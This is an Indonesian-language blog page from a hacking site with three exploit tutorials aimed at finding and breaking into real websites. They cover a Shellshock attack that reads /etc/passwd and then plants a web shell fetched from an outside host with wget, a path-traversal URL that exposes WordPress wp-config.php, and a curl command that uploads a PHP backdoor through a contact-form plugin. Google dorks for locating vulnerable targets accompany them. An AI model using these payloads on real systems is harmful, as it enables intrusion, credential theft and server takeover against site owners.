LinuxSec Exploit

Nothing is Ever Locked

Bugs

Shellshock Vulnerability Exploit on Linux Server

by Jack Wilder 2 Comments

Oke sebener nya ini bug lama sih. 2014 sudah dipublish. dan sudah banyak target vuln yang dipatch. tapi kenyataannya web Paspampres jebol gara gara bug lama ini. helehhh…. admin web Indo payah ! . Oke sekarang saya mau jelasin sedikit cara exploitbug Shellshock ini.
Bahan :
VPS . saran sih pake VPS, kalo enggak, ribet mesti ip statis, ngubah port, konek netcat dll. Ane juga gak mudeng.
PHP Exploit :
disini
Dork :
inurl:/cgi-bin/ ext:sh
inurl:/cgi-bin/ ext:cgi 
use your brain, bitch !

Oke saya anggep sudah dapet target vuln .
contoh aja deh :
localhost/cgi-bin/test-cgi
Sekarang kita login vps dulu.
simpan exploit php diatas di folder root. nyari gampang aja. kasih nama xxx.php
Setelah itu, kita masukkan command berikut .
curl -A “() { :; }; echo; /bin/cat /etc/passwd” http://localhost/cgi-bin/test-cgi > jembot.txt

Ini untuk melihat isi dari file etc/passwd dan disimpan di file dengan nama jembot.txt

sekarang masukkan command cat jembot.txt
Pastikan isi dari etc/passwd nya muncul disini.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
oracle:x:500:500::/home/oracle:/bin/bash
asywprod:x:503:502:asycuda world live operations:/home2/asywprod:/bin/bash
asy:x:504:504:asycuda prototype owner:/home2/asy:/bin/bash
asyw:x:505:502:Asycuda super user:/home2/asyw:/bin/bash
backup:x:506:506::/home/backup:/bin/bash

Tujuannya untuk melitah path public_html dari web yang akan kita exploit tadi.
Misalkan kita sudah tau kalo path web nya ada di /home2/asy/public_html/

maka masukkan command :
php xxx.php -u http://localhost/cgi-bin/test-cgi -c “wget http://yuyudhn1337.org/exp/cmdshell.txt -O /home2/asy/public_html/memek.php”

Pastikan sampai ada notif “command send to server”

Cek shellmu akan berada di localhost/memek.php
Sekian tutor kali ini semoga bermanfaat.

NB : copas tanpa sumber, mandul. thanks

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

by Jack Wilder Leave a Comment

Yupp, kali ini mau share lagi exploit pada WordPress yang memiliki celah pada plugins WP Mobile Edition.
Plugin ‘WP Mobile Edition’ ini tidak memfilter parameter GET file di /themes/mTheme-Unus/css/css.php . Alhasil kita juga dapat melihat source dari konfigurasi WordPress yang terletak di wp-config.php .
Oke langsung saja.
Google Dorks :
inurl:?fdx_switcher=mobile
Exploit :
127.0.0.1/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

Tested on : BackBox Linux

Sekian tutor kali ini semoga bermanfaat.

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

by Jack Wilder 1 Comment

Oke lama ya tidak membahas exploit web . Hehehe. barusan buka 1337day dan kebetulan ada exploit yang baru dirilis. Nama nya Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability . Langsung saja ke tutorial ya :
Google Dorks :
intitle: index of /uploads/contact_files/
– use your brain, bitch !

Shell location :
http://victim/wp-content/uploads/contact_files/backdoor.php
Tested on :
BackBox Linux

Anggap sudah meneumuakn target.
Sekarang masuk terminal linux.
[email protected] ~ % mkdir exp
[email protected] ~ % cd exp

Kita membuat folder exp dan masuk ke direktori tersebut .
Lalu kita masukkan backdoor kita disitu.
Misalkan saya membuat backdoor x.php di folder exp tadi.
Lalu masukkan command berikut :
curl -k -X POST -F “action=upload” -F “[email protected]/[backdoor.php]” -F “action=nm_webcontact_upload_file” http://target/wp-admin/admin-ajax.php
Contoh :
Disana tertulis :
{“status”:”uploaded”,”filename”:”1428981565-x.php“}%
Maka shell akan berada di :
http://localhost/bugs/wp-content/uploads/contact_files/1428981565-x.php

Sekian dan semoga bermanfaat .
Happy exploiting 🙂

Powered by WordPress and Genesis Framework. Style by LinuxSec.